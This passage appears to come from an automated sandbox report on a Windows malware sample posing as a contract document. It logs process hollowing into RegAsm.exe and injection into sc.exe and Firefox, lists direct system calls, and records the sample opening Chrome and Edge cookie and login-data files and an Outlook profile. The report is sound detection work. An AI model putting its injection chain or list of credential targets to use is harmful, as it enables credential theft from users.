Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE908 mov eax, dword ptr fs:[00000030h] 1_2_028CE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028CE908 mov eax, dword ptr fs:[00000030h] 1_2_028CE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02848918 mov eax, dword ptr fs:[00000030h] 1_2_02848918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_02848918 mov eax, dword ptr fs:[00000030h] 1_2_02848918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028DC912 mov eax, dword ptr fs:[00000030h] 1_2_028DC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028E892B mov eax, dword ptr fs:[00000030h] 1_2_028E892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D892A mov eax, dword ptr fs:[00000030h] 1_2_028D892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_028D0946 mov eax, dword ptr fs:[00000030h] 1_2_028D0946
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num7, length, 12288, 64)
Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num37 + 8, ref buffer, 4, ref bytesWritten)
Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num14, payload, bufferSize, ref bytesWritten)
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryInformationToken: Direct from: 0x76F02CAC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtTerminateThread: Direct from: 0x76F02FCC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtNotifyChangeKey: Direct from: 0x76F03C2C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtResumeThread: Direct from: 0x76F036AC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Thread register set: target process: 984 Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Thread APC queued: target process: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7AD008 Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Queries volume information: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs